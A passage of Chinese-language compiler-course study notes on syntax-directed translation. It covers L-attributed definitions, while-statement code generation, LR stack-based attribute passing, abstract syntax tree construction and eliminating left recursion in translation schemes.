  • D 生成一系列声明(Declaration)
  • T 生成不同的类型(Type)
  • B 生成基本类型 int/float
  • C 表示分量,生成 [num] 序列

注意 record 中用 D 嵌套表示各个字段的声明。

字段声明和变量声明的文法一致。

局部变量的存储布局

  • 变量的类型可以确定变量需要的内存(即类型的宽度)
  • 可变大小的数据结构只需要考虑指针
  • 函数的局部变量总是分配在连续的区间
  • 给每个变量分配一个相对于这个区间开始处的相对地址,变量的类型信息保存在符号表中

计算 T 的类型和宽度的 SDT

综合属性:$\text{type, width}$

全局变量 $t$ 和 $w$ 用于将类型和宽度信息从 $B$ 传递到 $C \to \varepsilon$

相当于 $C$ 的继承属性,因为总是通过拷贝来传递,所以在 SDT 中只赋值一次。

也可以把 $t$ 和 $w$ 替换为 $C.\text{type}$ 和 $C.\text{width}$(继承属性)

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{动作} \ \hline T \to B & { t = B.\text{type}; w = B.\text{width}; } \ \phantom{ T \to \ } C & { T.\text{type} = C.\text{type}; T.\text{width} = C.\text{width} } \ \hline B \to \textbf{int} & { B.\text{type} = \text{integer}; B.\text{width} = 4; } \ B \to \textbf{float} & { B.\text{type} = \text{float}; B.\text{width} = 8; } \ \hline C \to \varepsilon & { C.\text{type} = t; C.\text{width} = w; } \ C \to [ \textbf{num} ] C_1 & { C.\text{type} = \text{array}(\textbf{num.value}, C_1.\text{type}); } \ & { C.\text{width} = \textbf{num.value} \times C_1.\text{width}; } \ \hline \end{array} $$

例子:

image-20241118143537446

💾

语法制导翻译 III

2024年11月10日 22:10

基础属性文法(SDD)

(后文中均以此为例说明)

这是一个 while 的常见语法:

$$ S \rightarrow \text{while} (C) \ S_1 $$

这里:

  • $S$ 是生成各种语句的非终结符号,我们假设这些语句包括 $\text{if}$ 语句、赋值语句和其他类型的语句
  • $C$ 表示一个条件表达式,也即一个值为真或假的布尔表达式

这个 $\text{while}$ 语句的含义是首先对条件表达式 $C$ 求值。

  • 如果 $C$ 是真,控制就转向 $S_1$ 的代码开始处(循环体)
  • 如果 $C$ 的值为假,那么控制就转向跟在这个 $\text{while}$ 语句的代码之后的代码(循环结束)

我们还必须设计 $S_1$ 的代码,使得它在结束的时候能够跳转到这个 $\text{while}$ 语句的代码开始处(也即 $C$ 处),继续下一轮循环条件判断。

为此,我们生成一些形式为 $\text{label } L$ 的指令,其中 $L$ 是一个标识符。这个指令表明后一句指令的标号是 $L$,这会方便我们定位语句。

从而,我们得到这个 L 属性 SDD (回忆:SDD 是上下文无关文法和属性 / 规则的结合)的属性计算:

$$ \begin{array}{|l|l|} \hline \text{产生式} & \text{语义规则} \ \hline S \rightarrow \text{while} (C) \ S_1 & L1 = \text{new()} \ & L2 = \text{new()} \ & S_1.\text{next} = L1 \ & C.\text{false} = S.\text{next} \ & C.\text{true} = L2 \ & S.\text{code} = \text{label} \ || \ L1 \ || \ C.\text{code} \ || \ \text{label} \ || \ L2 \ || \ S_1.\text{code} \ \hline \end{array} $$

(注:有一说一,第一次看这个的时候很迷惑,但是如果你写完了 lab 的 lv6、lv7 之后你会发现毫无难度)

我们使用下面的属性来生成正确的中间代码:

  1. 继承属性 $S.\text{next}$ 是必须在 $S$ 执行结束之后执行的代码的开始处的标号,在调用这个产生式推导之前就已经有了
  2. 综合属性 $S.\text{code}$ 是中间代码的序列,它实现了语句 $S$
  3. 继承属性 $C.\text{true}$ 是在 $C$ 为真时执行的代码的开始处的标号
  4. 继承属性 $C.\text{false}$ 是在 $C$ 为假时执行的代码的开始处的标号
  5. 综合属性 $C.\text{code}$ 是一个中间代码的序列,它实现了条件表达式 $C$

转换上述 SDD 为 SDT 的语义动作:

$$ \begin{array}{|r|l|} \hline \text{产生式} & \text{语义动作} \ \hline S \rightarrow \text{while} ( & {L1 = \text{new()}; L2 = \text{new()}; C.\text{false} = S.\text{next}; C.\text{true} = L2; } \ C) & { S_1.\text{next} = L1; } \ S_1& { S.\text{code} = \text{label} \ || \ L1 \ || \ C.\text{code} \ || \ \text{label} \ || \ L2 \ || \ S_1.\text{code}; } \ \hline \end{array} $$

注意,这里把原先的语义动作分开后插入到了产生式中。

为什么要这么做?

因为我们需要先根据依赖关系计算需要用到的属性,然后进行代码生成。

$L1 = \text{new()}; L2 = \text{new()}$:存放了在代码片段需要的标号(函数 $\text{new()}$ 生成了新的标号),后续定位代码时需要用到

  • $L1$ 存放了条件判断语句(同时也是 $\text{while}$ 语句)的开始标号,每次循环体 $S_1$ 结束时需要跳转至此
  • $L2$ 存放了 $S_1$ 的开始标号,当 $C$ 为真时需要跳转至此

这里在展开下一步对应的表达式前,设置了两个继承属性:

  • $C.\text{false} = S.\text{next}; C.\text{true} = L2$:计算 $C$ 的继承属性,$C$ 为真 / 假时应该跳转到哪里
  • $S_1.\text{next} = L1$:计算 $S_1$ 的继承属性,$S_1$ 结束后需要跳转至 $L1$

类似我们现在正在展开的 $S$,以上继承属性,在即将展开 $C$、$S_1$ 的时候会用到。

这样,再递归的调用 $C$ 和 $S_1$ 的语义动作,就可以生成正确的综合属性(中间代码) $C.\text{code}$ 和 $S_1.\text{code}$。

在最后,我们已经完成了 $S$ 产生式体内所有计算综合属性 $S.\text{code}$ 所需要的属性,从而可以在这个产生式的最后生成综合属性(中间代码) $S.\text{code}$。

L 属性 SDD 的实现方法

递归下降函数法

使用递归下降的语法分析器,为每个非终结符建立一个函数,在函数中计算属性。

$$ \begin{array}{l} \textbf{string } S(\text{label next}) { \ \quad \textbf{string } Scode, Ccode; \quad /* 存放代码片段的局部变量 / \ \quad \text{label } L1, L2; \quad / 局部标号 / \ \quad \textbf{if} ( 当前输入 == 词法单元\textbf{while} ) { \ \quad \quad 读取输入; \ \quad \quad 检查 \text{“(”} 是下一个输入符号, 并读取输入; \ \quad \quad L1 = \textbf{new}(); \ \quad \quad L2 = \textbf{new}(); \ \quad \quad Ccode = C(\text{next, L2}); \quad / 当条件为真时跳转为 S 最开始的 next 标号,否则跳转至 L2 / \ \quad \quad 检查 \text{“)”} 是下一个输入符号, 并读取输入; \ \quad \quad Scode = S(L1); \ \quad \quad \textbf{return}(\text{“label”} | L1 | Ccode | \text{“label”} | L2 | Scode); \ \quad } \ \quad \textbf{else} { / 其他语句类型 */ } \ } \end{array} $$

类似上述展开方式,只不过我们将 “展开” 这一动作实现为了函数调用,用中间值 $Scode$ 和 $Ccode$ 来存放递归调用得到的中间代码片段。

对于 $C()$ 和 $S()$ 的调用,我们将其所需要的继承属性作为参数传递过去。

递归下降、边扫描边生成(On-the-fly)

使用递归下降的语法分析,边扫描边生成代码(on-the-fly)。

递归下降函数法存在的问题:当属性值很大时,对属性值进行运算的效率很低

我们总需要用中间值 $Scode$ 和 $Ccode$ 来存放递归调用得到的中间代码片段,而且最后会返回 $S.\text{code}$。这些中间值可能是一个上百 KB 的串,对其进行并置等运算会比较低效。

所以,我们可以逐步生成属性的各个部分,并增量式添加到最终的属性值中。

可行性条件

  • 存在一个 主属性,且主属性是综合属性
  • 在各个产生式中,主属性是通过产生式体中各个非终结符号的主属性 连接(并置) 得到的。同时还会连接一些其它的元素
  • 各非终结符号的主属性的连接顺序和它在产生式体中的顺序相同

此时,只需要在适当的时候 “发出(emit)” 非主属性的元素,即把这些元素拼接到适当的地方就可以了。

人话:就是分开生成,只要生成顺序正确,那么最后结果也是正确的,和 lab 里一样。

举例

产生式:$S \to \text{while} (C) , S1$,目标 $S.code = \text{Label} , || , L1 , || , C.code , || , \text{Label} , || , L2 , || , S1.code$

SDT: $$ \begin{array}{|r|l|} \hline \text{产生式} & \text{语义动作} \ \hline S \rightarrow \text{while} ( & {L1 = \text{new()}; L2 = \text{new()}; C.\text{false} = S.\text{next}; C.\text{true} = L2; \text{print}(\text{“label”}, L1); } \ C) & { S_1.\text{next} = L1; \text{print}(\text{“label”}, L2); } \ S_1& \ \hline \end{array} $$

继续推导 $C$ 和 $S_1$ 的时候,会自动生成相应的代码,并且其继承属性已经提前设置。

为了避免刚才说的问题,我们可以在处理 $S$ 时,先调用 $C$,再调用 $S$(对应于 $S_1$)。

如果各个函数把属性 $code$ 打印出来,我们处理 $\text{while}$ 语句时,只需要:

  1. 先打印 $\text{Label} , L1$
  2. 再调用 $C$(打印 $C$ 的代码)
  3. 再打印 $\text{Label} , L2$
  4. 再调用 $S$(打印 $S1$ 的代码)

对于当前这个规则而言,只需要处理 1、3,即打印 $\text{Label} , L1$ 和 $\text{Label} , L2$,2、4 在 $C()$ 和 $S()$ 中处理。

$$ \begin{array}{l} \textbf{string } S(\text{label next}) { \ \quad \text{label } L1, L2; \quad /* 局部标号 / \ \quad \textbf{if} ( 当前输入 == 词法单元\textbf{while} ) { \ \quad \quad 读取输入; \ \quad \quad 检查 \text{‘(’} 是下一个输入符号, 并读取输入; \ \quad \quad L1 = \textbf{new}(); \ \quad \quad L2 = \textbf{new}(); \ \quad \quad print(\text{“label”} | L1); \ \quad \quad C(\text{next, L2}); \quad / 当条件为真时跳转为 S 最开始的 next 标号,否则跳转至 L2 / \ \quad \quad print(\text{“label”} | L2); \ \quad \quad 检查 \text{‘)’} 是下一个输入符号, 并读取输入; \ \quad \quad S(L1); \ \quad } \ \quad \textbf{else} { / 其他语句类型 */ } \ } \end{array} $$

注意:没有最后的 $\text{return}$ 语句了,改为分阶段 $\text{print}$。

自底向上语法分析

以 LL 文法为基础的 L 属性 SDD 可以在 LR 语法分析(自底向上) 过程中实现。

我们遵循如下的三个原则:

  1. 首先构造出 L 属性 SDD 的 SDT,这样的 SDT:

    • 在各个非终结符号之前放置语义动作来计算它的继承属性
    • 并且在产生式后端放置一个动作来计算综合属性
  2. 对 $A$ 的规则中每个内嵌的语义动作 $a$,向这个文法中引入一个标记非终结符号 $M$ 来替换它。每个这样的位置都有一个不同的标记,并且对于任意一个标记 $M$ 都有一个产生式 $M \rightarrow \varepsilon$

  3. 如果标记非终结符号 $M$ 在某个产生式 $A \rightarrow \alpha {a} \beta$ 中替换了语义动作 $a$,对 $a$ 进行修改得到 $a'$,并且将 $a'$ 关联到 $M \rightarrow \varepsilon$ 上。这个动作 $a'$:

    1. 将动作 $a$ 需要的 $A$ 或 $\alpha$ 中符号的任何属性作为 $M$ 的 继承属性 进行拷贝

      注:L 属性 SDD 保证了它计算的时候所需要的继承属性不包括右边 $\beta$ 的属性。

    2. 按照 $a$ 中的方法计算各个属性,但是将计算得到的这些属性作为 $M$ 的 综合属性

动作 $a'$ 必须设法找到相应的属性,因为产生式 $M \rightarrow \varepsilon$ 中没有 $A$ 的符号。

这个变换看起来是非法的,因为通常和产生式 $M \rightarrow \varepsilon$ 相关的动作将不得不访问某些没有出现在这个产生式中的文法符号的属性(如 $A.i$)。

然而,我们将在 LR 语法分析栈上实现各个语义动作。就像我们现在在栈中添加了 $M$ 一样,在规约到 $A$ 之前,我们亦会在栈中其前添加一个记录,其存放 $A$ 的一些属性。

所以,必要的属性总是可用的,它们位于栈顶之下的已知位置上。

所有这些属性的拷贝工作能够正确进行的原理是:所有拷贝都发生在对某个非终结符号的一次展开时创建的不同记录之间。

因此,这些记录中的每一个都知道其他各个记录在栈中离它有多远,因此可以安全地把值写到它下面的记录中。

举例 1

$$ A \rightarrow {B.i=f(A.i);}BC $$

引入 $M$ 后变为:

  • $A \rightarrow MBC$
  • $M \rightarrow \varepsilon {M.i=A.i; M.s=f(M.i);}$

以下给出对于栈结构说明的一个 基础约定(和 PPT 原文有变动)

  • 栈由各个记录组成,图中栈顶 / 栈上方在右,栈底 / 栈下方在左。
  • 每个记录包含多个域,每个域对应一个属性。

即:

    • 记录 X
      • 域 1(属性)
      • 域 2(属性)
    • 记录 Y
      • 域 1(属性)
      • 域 2(属性)

属性传递过程

  • 当执行到 $M$ 的归约时,$A.i$ 的值存放在 $M$ 记录的栈下方记录的域(当然,这个域的名字肯定不是 $A$)中
  • 如果产生式右部为 $KMBC$,那么在栈中,$M$ 记录的栈下方记录为 $K$,$K$ 的某个域中存放 $A.i$
  • $M.s$ 即 $B.i$,$M$ 记录的栈下方记录存放 $A.i$,即将归约到 $B$ 时,$B.i$ 存放在栈中归约位置的下方记录中

我觉得这里理解起来比较烦,但你可以这么想:我们随时都要确保进行一次规约之前,其所需要的继承属性都已经准备好了,所以对于 $A \rightarrow MBC$,我们未来要规约到 $A$,那么 $A$ 所需要的继承属性必然也要提前准备好,位置就在当前栈下方记录的域,这个域可以是当前产生体的一部分,比如上文的 $K$,也可能是不在产生体中的,比如还有一个 $S \rightarrow DA$,那么就会在 $D$ 记录里。

举例 2

原始规则:

$$ \begin{array}{|r|l|} \hline \text{产生式} & \text{语义动作} \ \hline S \rightarrow \text{while} ( & {L1 = \text{new()}; L2 = \text{new()}; C.\text{false} = S.\text{next}; C.\text{true} = L2; } \ C) & { S_1.\text{next} = L1; } \ S_1& { S.\text{code} = \text{“label”} \ || \ L1 \ || \ C.\text{code} \ || \ \text{“label”} \ || \ L2 \ || \ S_1.\text{code}; } \ \hline \end{array} $$

转换为:

$$ \begin{align*} S &\rightarrow \text{while}(M C) N S_1 \ M &\rightarrow \varepsilon \ N &\rightarrow \varepsilon \end{align*} $$

image-20241110130636625

按照此产生式归约,我们希望会首先规约 $\varepsilon \leftarrow M$,然后规约 $\varepsilon \leftarrow N$,最后将 $\text{while}(M C) N S_1$ 规约回 $S$(LR 从左到右读,然后逐渐归约)。

  • $S.\text{next}$ 位于栈中右部的栈下方记录的域中(它会在规约完 $S$ 的后续流程中被修改为正确的值,就像你现在还没规约到 $C$,但是使用了一个 $M$ 来存储)
  • $C$ 的继承属性 $\text{true}$、$\text{false}$ (即条件满足 / 不满足时的下一句指令的位置)位于栈中紧靠 $C$ 的下方记录 $M$ 的域中

当将 $\varepsilon$ 规约到 $M$ 时,由于我们需要将 $C.\text{false}$ 的值设为 $M$ 的一个域,所以我们在栈中 $M$ 的栈下方记录中找到 $S.\text{next}$ 的值,它就是 $C.\text{false}$ 的值。

由于此时栈顶指针在 $M$,所以这里执行的是 $C.\text{false} = \text{stack[top-3].L1}$。

这样在下一步规约 $C$ 时,其所需要的继承属性 $\text{true}$ 和 $\text{false}$ 都已经计算完毕,并存放在栈中紧靠在它栈下方记录 $M$ 的域中。

又一例:92339

  • 我们要为即将到来的规约到 $S_1$ 做准备,所以要准备 $S_1.\text{next}$,存放在 $N$ 的栈记录中,使得它恰好存放在紧靠 $S_1$ 的栈记录之下的记录 $N$ 的域中
  • $S_1.\text{next} = \text{stack[top-3].L1}$(此时 $\text{top}$ 指针在 $N$)

image-20241110130756724

  • 这个时候就要执行对 $S_1$ 的规约就可以用其继承属性 $S_1.\text{next}$ 了。

最终得到:

$$ \begin{array}{|l|l|} \hline \text{产生式} & \text{规约时动作} \ \hline S \to \text{while} ( M C ) N S_1 & \text{tempCode }= \text{label} , || , \text{stack}[\text{top} - 4].L1 , || \ & \quad \text{stack}[\text{top} - 3].\text{code} , || , \text{“label”} , || , \text{stack}[\text{top} - 4].L2 , || \ & \quad \text{stack}[\text{top}].\text{code}; \ & \text{top} = \text{top} - 6; \ & \text{stack}[\text{top}].\text{code} = \text{tempCode}; \ \hline M \to \varepsilon & \text{top} = \text{top} + 1; \ & L1 = \text{new()}; \ & L2 = \text{new()}; \ & C.\text{true} = L2; \ & C.\text{false} = \text{stack}[\text{top} - 3].\text{next}; \ \hline N \to \varepsilon & \text{top} = \text{top} + 1; \ & S_1.\text{next} = \text{stack}[\text{top} - 3].L1; \ \hline \end{array} $$

$$ \begin{array}{c} \hline 0 & 1 & 2 & 3 & 4 & 5 & 6 & 7 \ \hline ? & \text{while} & ( & M & C & ) & N & S_1 \ \hline S.\text{next} & & & C.\text{true} & C.\text{code} & & S_1.\text{next} & S_1.\text{code} \ & & & C.\text{false} & & & & \ & & & L_1 & & & & \ & & & L_2 & & & & \ \hline \end{array} $$

确定继承属性在分析栈中的位置

综合属性值很容易在栈中($\text{stack}[i].\text{val}$)找到,因此在自底向上分析中处理 L 属性定义的关键是 确定继承属性值在栈中的位置

实际使用中,$X$ 的继承属性 $X.i$ 通常和文法符号 $Y$ 的综合属性 $Y.s$ 有关:

  • 或者是 $Y.s$ 的直接拷贝
  • 或者是 $Y.s$ 值的函数值

例子

image-20241110131217312

image-20241110131245070

在原始文法中,属性 $A.s$ 需要传递给 $C.i$。

但是由于存在两个产生式 $S \to aA{C.i = A.s}C$ 与 $S \to bAB{C.i = A.s}C$,所以要规约到 $C$ 时,我们不知道 $A.i$ 应该在相对于栈顶的 $\text{stack}[\text{top}-1]$ 还是 $\text{stack}[\text{top}-2]$ 记录获得。

通过引入 $M$,可以将这个过程明确为:

$$ A.s \rightarrow M.i = M.s \rightarrow C.i $$

即:分解复杂的属性传递路径,使得属性的传递过程变得更清晰、可控。

image-20241110131312248

先一步一步传下来继承属性,然后再在 $M$ 内部完成计算,因为这样可以明确参数在栈中的位置。

即:通过分解复杂的计算过程,使得每一步都能够明确地进行属性传递和计算。

💾

语法制导翻译 II

2024年11月10日 22:09

构造抽象语法树的 SDD

抽象语法树 (Abstract Syntax Tree)

  • 每个 结点 代表一个语法结构,对应于一个 运算符
  • 结点的每个 子结点 代表其子结构,对应于 运算分量
  • 表示这些子结构按照特定方式组成更大的结构
  • 可以忽略掉一些标点符号等非本质的东西

语法树的表示方法

  • 每个结点用一个对象表示
  • 对象有多个域
    • 叶子结点中只存放词法值
    • 内部结点中存放 $\text{op}$(操作符)值和参数(通常指向其它结点)

抽象语法树的例子

产生式 $S \rightarrow \text{if } B \text{ then } S_1 \text{ else } S_2$ 的语法树

          if-then-else
          /     |     \
         B     S_1    S_2
class StmtIfAST : public BaseAST {
public:
    unique_ptr<BaseAST> exp;
    unique_ptr<BaseAST> then_stmt;
    optional<unique_ptr<BaseAST>> else_stmt;
    Result print() const override;
};

赋值语句的语法树

          assignment
          /        \
   variable    expression
class StmtAssignAST : public BaseAST {
public:
    unique_ptr<BaseAST> l_val;
    unique_ptr<BaseAST> exp;
    Result print() const override;
};

注意:在语法树中,运算符号和关键字都不在叶结点,而是在内部结点中出现

抽象语法树 vs 具体语法树

image-20241110005517160

image-20241110005541711

可以看到,AST 相较于具体语法树,不再包含标点符号等非本质的东西,而且不再像具体语法树一样表示为推导的完整过程,而是带有了一部分的语义信息。

抽象语法树的构造

定义:抽象语法树中的每个结点代表一个程序构造,子结点代表构造的组成部分。

例如,表达式 $E_1 + E_2$ 的语法树结点标号为 $+$,子结点分别代表 $E_1$ 和 $E_2$。

结点构造: 每个结点有一个 $\text{op}$ 字段表示结点标号,及以下字段:

  1. 叶子结点(Leaf)
    • 有一个附加域存储此叶子结点的词法值
    • 构造函数 $\text{Leaf}(\text{op}, \text{val})$ 创建叶子结点对象
    • 例如:$\text{Leaf}(\text{num}, 5)$ 表示一个叶子结点,标号为 $\text{num}$,值为 $5$
  2. 内部结点(Node)
    • 附加字段数量等于结点的子结点数量
    • 构造函数 $\text{Node}(\text{op}, c_1, c_2, ..., c_k)$ 创建内部结点对象
    • 例如:$\text{Node}(+, E_1, E_2)$ 表示一个内部结点,标号为 $+$,子结点为 $E_1$ 和 $E_2$

总结:

  • 抽象语法树结点通过 $\text{op}$ 字段表示 标号,叶子结点通过 $\text{val}$ 存储 ,内部结点通过 构造函数 $\text{Node}$ 连接子结点
  • 属性 $\text{E.node}$ 指向 $\text{E}$ 对应的这一块 以之为根节点的语法树 的一部分

image-20241110010050014

自顶向下的 AST 构造过程

$$ \begin{array}{|l|l|l|} \hline & \quad \textbf{产生式}&\textbf{语义规则}\ \hline \textbf{1)} & \quad E \rightarrow T , E' & E.\text{node} = E'.\text{syn} \ & &E'.\text{inh} = T.\text{node} \ \hline \textbf{2)} & \quad E' \rightarrow + , T , E'_1 & E'_1.\text{inh} = \text{new Node}('+', E'.\text{inh}, T.\text{node}) \ & & E'.\text{syn} = E'_1.\text{syn} \ \hline \textbf{3)} & \quad E' \rightarrow - , T , E'_1 & E'_1.\text{inh} = \text{new Node}('-', E'.\text{inh}, T.\text{node}) \ & & E'.\text{syn} = E'_1.\text{syn} \ \hline \textbf{4)} & \quad E' \rightarrow \varepsilon & E'.\text{syn} = E'.\text{inh} \ \hline \textbf{5)} & \quad T \rightarrow ( , E , ) & T.\text{node} = E.\text{node} \ \hline \textbf{6)} & \quad T \rightarrow \text{id} & T.\text{node} = \text{new Leaf}(\text{id}, \text{id.entry}) \ \hline \textbf{7)} & \quad T \rightarrow \text{num} & T.\text{node} = \text{new Leaf}(\text{num}, \text{num.val}) \ \hline \end{array} $$

对于式子 $a - 4 + c$,构造出语法分析树如下:

image-20241110011446937

注意:

  • 最后一列语义规则不一定是同时执行的,如在产生式(1)中,实际上先计算了继承属性 $E'.\text{inh} = T.\text{node}$,但是在最后才计算综合属性 $E.\text{node} = E'.\text{syn}$。
  • 一个文法符号可能对应多个结点,如图里结点 4、8 都对应同一个 $T$
  • 虚线部分构成的是一颗 语法分析树,而不是 抽象语法树

注意这张图中实际上有个关系:

  • 虚线:语法分析树
  • 黑线:依赖图,依赖图中的边表示的是依赖关系,而不是等于关系

非终结符号 $E'$ 有一个继承属性 $\text{inh}$ 和一个综合属性 $\text{syn}$。

属性 $\text{inh}$ 表示至今为止构造得到的部分抽象语法树

举例:$E'.\text{inh}$ 表示的是位于 $E'$ 的子树左边的输入串前缀所对应的抽象语法树的根

  1. 在图中的结点 5 处,$E'.\text{inh}$ 表示对应于节点 2($a$)的抽象语法树的根
  2. 在节点 6 处则对应节点 5($a - 4$)
  3. 在节点 9 处则对应节点 6($a - 4 + c$),因为没有更多的输入,所以在结点 9 处,$E'.\text{inh}$ 指向整个抽象语法树的根

继承属性可以把值从一个结构传递到另一个并列的结构,也可把值从父结构传递到子结构。

属性 $\text{syn}$ 把这个值沿着语法分析树向上传递,直到它成为 $E.\text{node}$ 的值

举例:

  1. 结点 10 上的属性值 $E'.\text{syn}$ 是通过产生式 4 所关联的规则 $E'.\text{syn} = E'.\text{inh}$ 来定义的
  2. 结点 11 处的属性值 $E'.\text{syn}$ 是通过产生式 2 所关联的规则 $E'.\text{syn} = E'_1.\text{syn}$ 来定义的
  3. 类似的规则还定义了结点 12 和 13 处的值

语法制导的翻译方案(SDT)

定义:语法制导的翻译方案(syntax-directed translation scheme,SDT)是对语法制导定义的补充,也称作语法制导的翻译模式。

  • 把 SDD 的 语义规则改写为计算属性值的程序片段,用花括号 ${}$ 括起来,插入到产生式右部的任何合适的位置上
  • 这种方法表示语法分析和语义动作交错,可以在按 深度优先 遍历分析树的过程中随时执行语义动作

说人话:

  • SDT 是在语法分析过程中附带语义动作(程序计算片段)
  • 语义动作可以放在产生式的任意位置,通常用大括号 ${}$ 包围

基础文法:原来的不含语义动作的文法称作基础文法。

举例

一个简单的 SDT (只包含 +/- 操作的表达式):

$$ \begin{aligned} E \rightarrow& TR \ R \rightarrow& \text{addop } T { \text{print(addop.lexeme)} } R_1 \ |& \varepsilon \ T \rightarrow& \text{num} { \text{print(num.val)} } \end{aligned} $$

image-20241110011826210

图中 pt 即 print,以深度优先搜索遍历这颗树的时候,即得到后缀表达式。

SDT 的实现方法

基本实现方法

  • 建立语法分析树
  • 将语义动作看作是虚拟的结点
  • 从左到右,深度优先地遍历分析树,在访问虚拟结点时执行相应动作

通常情况下在语法分析过程中实现,不需要真的构造语法分析树。

实现 SDD 的两种重要基础文法

  • 基础文法是 LR 的,SDD 是 S 属性的

    LR:自底向上、从左向右扫描、进行最右推导的逆操作,即从左边开始归约

  • 基础文法是 LL 的,SDD 是 L 属性的

    LL:自顶向下、从左向右扫描、进行最左推导

翻译方案的设计

原则

  1. 根据语法制导定义设计翻译方案
  2. 需要保证语义动作不会引用还没有计算的属性值

只需要综合属性的情况

操作:为每一个语义规则建立一个包含赋值的动作,并把这个动作放在相应的产生式右边的末尾

例如:

$$ \text{T} \rightarrow \text{T}_1 * \text{F} $$

所需动作:$\text{T.val} = \text{T}_1.\text{val} * \text{F.val}$

改写后:

$$ \text{T} \rightarrow \text{T}_1 * \text{F} {\text{T.val} = \text{T}_1.\text{val} * \text{F.val}} $$

既有综合属性又有继承属性

原则:

  • 产生式 右边 的符号的 继承属性 必须在 这个符号以前 的动作中计算出来(不然上哪里去继承?)

  • 一个动作 不能引用 这个动作 右边符号的综合属性 (还没算到右边符号呢)

    继承属性肯定得允许,不然你赋值 ${ \text{A}_1.\text{in} = 1 } \text{A}_1$ 都不行。

  • 产生式 左边非终结符号的综合属性 只有在它所 引用的所有属性都计算出来 以后才能计算

    计算这种属性的动作通常可放在产生式右端的末尾(同上文只需要综合属性的情况)

例如:

$$ \text{S} \rightarrow \text{A}_1 \text{A}_2 { \text{A}_1.\text{in} = 1;\text{A}_2.\text{in} = 2 } \ \text{A} \rightarrow a { \text{print(A.in)} } $$

此翻译方案不满足要求(违背原则 1,应该在 $\text{A}_1$ 出现之前,先算出其继承属性 $\text{A}_1.\text{in}$),可以改成如下的形式:

$$ \text{S} \rightarrow { \text{A}_1.\text{in} = 1 } \text{A}_1 { \text{A}_2.\text{in} = 2 } \text{A}_2 \ \text{A} \rightarrow a { \text{print(A.in)} } $$

后缀翻译方案

后缀 SDT:所有动作都在产生式最右端的 SDT

文法可以自底向上分析且 SDD 是 S 属性的,必然可以构造出后缀 SDT。

构造方法

  • 将每个语义规则看作是一个赋值语义动作
  • 将所有的语义动作放在规则的 最右端

举例

image-20241110013021198

后缀 SDT 的语法分析栈实现

实现方法:可以在 LR 语法分析的过程中实现。

  • 归约时 执行相应的语义动作
  • 定义用于记录各文法符号的属性的 union 结构
  • 栈中的每个文法符号(或者说状态)都附带一个这样的 union 类型的值

在按照产生式 $A \rightarrow XYZ$ 归约时,$Z$ 的属性可以在栈顶找到,$Y$ 的属性可以在下一个位置找到,$X$ 的属性可以在再下一个位置找到。

image-20241110013128864

image-20241110013327594

上图展示了一个规约的过程,把 $XYZ$ 规约回了 $A$,并在此过程中完成了属性的传递。

image-20241110013354457

再次强调:这是自底向上的分析过程,语义动作在规约时生效。

产生式内部带有语义动作的 SDT

$$ B \rightarrow X {a} Y $$

动作左边的所有符号(以及动作)处理完成后 ,就立刻执行这个动作。

  • 自底向上分析时,(最早就开始)在 $X$ 出现在栈顶(即刚刚规约出 $X$)时执行动作 $a$
  • 自顶向下分析时,(延迟到最晚)在试图展开 $Y$ 或者在输入中检测到 $Y$ 的时候执行 $a$

有问题的 SDT

并不是所有的 SDT 都可以在分析过程中实现。

比如,从中缀表达式到前缀表达式的转换:

$$ \begin{array}{rl}

  1. & L \rightarrow E ; n \
  2. & E \rightarrow { \text{print}(\text{“+”}); } ; E_1 + T \
  3. & E \rightarrow T \
  4. & T \rightarrow { \text{print}(\text{“*”}); } ; T_1 * F \
  5. & T \rightarrow F \
  6. & F \rightarrow (E) \
  7. & F \rightarrow \text{digit} ; { \text{print}(\text{digit.lexval}); } \ \end{array} $$

在自顶向下和自底向上的分析中都无法实现这种 SDT:

在这个 SDT 中,操作符(+ 和 *)需要在操作数之前打印,这就是将中缀表达式转换为前缀表达式的要求。然而:

  • 在自顶向下分析中:

    • 分析过程是从左到右进行的
    • 当遇到产生式 $E \rightarrow E_1 + T$ 时,必须先处理 $E_1$
    • 但是根据语义动作的要求,我们需要在处理 $E_1$ 之前就打印“+”
    • 这造成了时序上的矛盾
  • 在自底向上分析中:

    • 分析过程是按照规约顺序进行的
    • 当要规约 $E_1 + T$ 到 $E$ 时,$E_1$ 和 $T$ 的值已经计算完成
    • 此时再打印“+”就太晚了,因为操作数已经处理完毕

所以,对于这种一般的 SDT,可以先建立分析树(语义动作作为虚拟的结点),然后进行前序遍历并执行动作。

消除左递归时 SDT 的转换方法

如果动作不涉及属性值,可以 把动作当作终结符号 进行处理,然后消左递归。

原始的产生式:

$$ \begin{aligned} E & \rightarrow E_1 + T { \text{print(“+”)} } \ E & \rightarrow T \end{aligned} $$

转换后得到:

$$ \begin{aligned} E & \rightarrow T R \ R & \rightarrow + T { \text{print(“+”)} } R \ R & \rightarrow \varepsilon \end{aligned} $$

左递归文法翻译方案的转换

带左递归的文法:

$$ \begin{aligned} E & \rightarrow E_1 + T { E.\text{val} = E_1.\text{val} + T.\text{val} } \ E & \rightarrow E_1 - T { E.\text{val} = E_1.\text{val} - T.\text{val} } \ E & \rightarrow T { E.\text{val} = T.\text{val} } \ T & \rightarrow (E) { T.\text{val} = E.\text{val} } \ T & \rightarrow \text{num} { T.\text{val} = \text{num}.\text{val} } \end{aligned} $$

转换后的不带有左递归的文法:

$$ \begin{aligned} E & \rightarrow T { R.\text{i} = T.\text{val} } R { E.\text{val} = R.\text{s} } \ R & \rightarrow + T { R_1.\text{i} = R.\text{i} + T.\text{val} } R_1 { R.\text{s} = R_1.\text{s} } \ R & \rightarrow - T { R_1.\text{i} = R.\text{i} - T.\text{val} } R_1 { R.\text{s} = R_1.\text{s} } \ R & \rightarrow \varepsilon { R.\text{s} = R.\text{i} } \ T & \rightarrow (E) { T.\text{val} = E.\text{val} } \ T & \rightarrow \text{num} { T.\text{val} = \text{num}.\text{val} } \end{aligned} $$

image-20241110013841264

举例

原有文法:

$$ \begin{aligned} A & \to A_1 Y { A.a = g(A_1.a, Y.y) } \ A & \to X { A.a = f(X.x) } \ \end{aligned} $$

消除左递归之后,文法转换成

$$ A \to XR \ R \to YR | \varepsilon $$

消除左递归后的翻译方案:

$$ \begin{aligned} A &\to X { R.i = f(X.x) } R { A.a = R.s } \ R &\to Y { R_1.i = g(R.i, Y.y) } R_1 { R.s = R_1.s } \ R &\to \varepsilon { R.s = R.i } \ \end{aligned} $$

image-20241118010809822

image-20241118010827545

注意事项

  • 并不是所有的 SDT 都可以在分析过程中实现
  • 后缀 SDT 以及 L 属性 SDT 可以在分析时完成

💾

语法制导翻译 I

2024年11月10日 22:08

概述

  1. 语法分析器

